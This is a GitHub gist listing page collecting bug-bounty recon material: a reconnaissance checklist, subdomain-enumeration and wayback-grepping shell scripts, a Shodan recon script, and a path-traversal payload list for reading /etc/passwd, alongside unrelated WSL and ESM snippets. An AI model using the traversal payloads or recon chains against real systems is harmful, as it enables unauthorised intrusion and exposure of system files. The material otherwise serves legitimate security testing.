Skip to content

Instantly share code, notes, and snippets.

View Diaa-Hassan's full-sized avatar
🧙

Diaa Hassan Diaa-Hassan

🧙
58 followers · 267 following
View GitHub Profile
@rohan-cce
rohan-cce / Recon Check List
Created December 9, 2020 12:07
❌❌ :RECON CHECKLIST:❌❌
1. Subdomain Enumeration: subfinder-amass-altdns-sublister-assetfinder-findomain
2.Resolving Subdomains: HTTPX/HTTPROBE
3. Screenshotting: HTTPX/AQUATONE/EYEWITNESS/GOWITNESS
4. Port Scan: Nmap/Zenmap/Aquatone/Amass
5. Directory Bruteforce: FFUF/Dirsearch/Dirbuster
6. Crawling: waybackurls/gau
7. Finding endpoints from JS: relative-url-extracter
8. Manual Recon: Burp Suite
@MathiasBaumgartinger
MathiasBaumgartinger / open.py
Last active September 8, 2022 05:28
WSL python script for easy opening of files and directories
#!/usr/bin/env python3
"""
Add this script to a global directory (e.g. /usr/local/bin) in your WSL
without the ``.py`` extension.
This script will automatically open any file/directory with it's default
Windows Application. Directories will be opened with Windows' file
explorer.
Usage: open <(dir/file)>
@nullenc0de
nullenc0de / breach.sh
Created January 27, 2021 15:06
Script will look up company assets and search them on greynoise.
cat cust.txt |assetfinder -subs-only | filter-resolved -c 100 | while read resolved; do host -t A "$resolved" | awk '{print $NF}' | grep -E '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'; done |sort -u |while read ip; do greynoise quick $ip ; done |grep -v "NOT" |cut -d ' ' -f1 |greynoise ip |sed -e '/malicious/,/rDNS/!d'
@haxcited
haxcited / bounty-prep.sh
Created February 11, 2021 06:24
#!/usr/bin/env bash
echo "Enter name of the program: "
read PROGNAME
echo "enter name of the seed domain for amass "
read SEED
BOUNTYD=$HOME/01/bounty
PLATFORM=h1
# create project directory
# ascr auto screenshot ,mscr manual screenshot
@scumdestroy
scumdestroy / poorGF.sh
Created February 11, 2021 14:01
#!/bin/sh
echo $1 | waybackurls > wayback-results
cat wayback-results | grep "\.conf" | tee $1-poorGF
cat wayback-results | grep "\.xml" | tee -a $1-poorGF
cat wayback-results | grep "\.db" | tee -a $1-poorGF
cat wayback-results | grep "\.log" | tee -a $1-poorGF
cat wayback-results | grep "config" | tee -a $1-poorGF
cat wayback-results | grep "env" | tee -a $1-poorGF
@scumdestroy
scumdestroy / pull-BugBounty-wildcards.sh
Created February 11, 2021 15:37
#!/bin/sh
curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/bugcrowd_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv' | grep '^*' | awk '{print $1}' | sed 's/^\*\.//g'| tee bugcrowd-wildcards
curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/federacy_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'| grep '^*' | awk '{print $1}' | sed 's/^\*\.//g'| tee federacy-wildcards
curl -sL https://github.com/arkadiyt/bounty-targets-data/blob/master/data/hackerone_data.json?raw=true | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type] | @tsv' | grep '^*' | awk '{print $1}' | sed 's/^\*\.//g'| tee h1-wildcards
curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/intigriti_data.json | jq -r '.[].targets.in_scope[] | [.endpoint, .type] | @tsv' grep '^*' | awk '{print $1}' | sed 's/^\*\.//g'| tee intigriti-wildcards
@chr0ll0x0
chr0ll0x0 / auto-subdomains.sh
Last active July 8, 2022 21:57
for subdomains
#!/bin/bash
#please install this tool first
#install jq
#Assetfinder - https://github.com/tomnomnom/assetfinder
#Subfinder - https://github.com/projectdiscovery/subfinder
#Amass - https://github.com/OWASP/Amass
#Findomain https://github.com/Findomain/Findomain
#Anew https://github.com/tomnomnom/anew
#crobat https://github.com/cgboal/sonarsearch/crobat
@0x240x23elu
0x240x23elu / traversals-8-deep-exotic-encoding.txt
Created February 23, 2021 05:20
traversals-8-deep-exotic-encoding.txt
/../etc/passwd
/../../etc/passwd
/../../../etc/passwd
/../../../../etc/passwd
/../../../../../etc/passwd
/../../../../../../etc/passwd
/../../../../../../../etc/passwd
/../../../../../../../../etc/passwd
/..%2fetc/passwd
/..%2f..%2fetc/passwd
@sindresorhus
sindresorhus / esm-package.md
Last active October 31, 2025 00:11
Pure ESM package

Pure ESM package

The package that linked you here is now pure ESM. It cannot be require()'d from CommonJS.

This means you have the following choices:

  1. Use ESM yourself. (preferred)
    Use import foo from 'foo' instead of const foo = require('foo') to import the package. You also need to put "type": "module" in your package.json and more. Follow the below guide.
  2. If the package is used in an async context, you could use await import(…) from CommonJS instead of require(…).
  3. Stay on the existing version of the package until you can move to ESM.
@Zeyad-Azima
Zeyad-Azima / shodrecon.py
Created May 2, 2021 22:46
A simple shodan recon script for bug bounty
#By: Zeyad Azima (https://github.com/Zeyad-Azima)
# install:
## pip3 install requests
## pip3 install shodan
# Run: python3 shodrecon.py target
import shodan, requests, json, threading, sys
# Your Api key here
API_KEY = ""